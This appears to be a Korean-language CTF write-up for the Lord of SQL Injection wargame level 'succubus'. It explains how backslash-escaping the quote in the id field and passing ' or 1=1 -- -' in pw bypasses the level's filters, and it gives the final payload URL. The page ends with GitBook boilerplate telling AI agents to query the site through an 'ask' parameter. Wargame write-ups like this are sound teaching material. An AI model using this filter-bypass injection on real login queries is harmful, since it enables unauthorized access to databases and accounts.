> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-succubus.md).

# \[Lord Of SQLInjection] succubus

<figure><img src="https://blog.kakaocdn.net/dna/ef5jEP/btsMBB7M4bT/AAAAAAAAAAAAAAAAAAAAAGr1PoxVcSc8cR88LwyEgBR9_KrE30w8xwBV2t8vcDUo/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=%2F%2Bem%2BOuz%2F6vpnsgb%2BJpYHTyySTw%3D" alt="" height="304" width="631"><figcaption></figcaption></figure>

```
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[id])) exit("No Hack ~_~"); 
  if(preg_match('/prob|_|\\.|\\(\\)/i', $_GET[pw])) exit("No Hack ~_~");
  if(preg_match('/\\'/',$_GET[id])) exit("HeHe");
  if(preg_match('/\\'/',$_GET[pw])) exit("HeHe");
```

→ get으로 서버에 요청된 id, pw 값에 prob, \_, ., (), ‘가 들어가면 필터링이 된다.

```
$query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 
```

→ 명령문은 id를 찾는데, prob\_succubus라는 테이블에 있어야하고, id, pw값은 요청된 id, pw값이어야 한다.

→ id를 찾으면 문제가 해결된다.

```
if($result['id']) solve("succubus");
```

⇒ id를 찾아야 해결되는 것이고, id를 알기 위해서는 id, pw 둘 다 알고 있어야한다. → 하지만 모르는 값들이기 때문에, sql injection을 이용하여 필터링을 잘 우회해서 문제를 풀어야한다.

→ id 값에 \를 넣어서 id 뒤에 있는 ‘의 의미를 문자열로 인식한다.

→ 다음 ‘인 pw 앞까지가 id의 범위가 된다.

→ pw 값에 ‘를 넣지 않도록 설계한다.

⇒ pw 값에 or를 넣고, 뒤에 true로 만들고 주석처리를 하면 문제가 해결된다.

```
[도메인값]?id=\\&pw= or 1=1 -- -
```

<figure><img src="https://blog.kakaocdn.net/dna/QMD3P/btsMBRCzBe3/AAAAAAAAAAAAAAAAAAAAALdgeLFKMp8XF-y9YhpzgXVaIkkCSzNwwbxriJAn1RX4/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=Ur7WtLj%2FlhupMmP9cCMi2FTjR9Y%3D" alt="" height="426" width="661"><figcaption></figcaption></figure>

→ 클리어 창이 뜨는 것을 확인할 수 있다.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-succubus.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.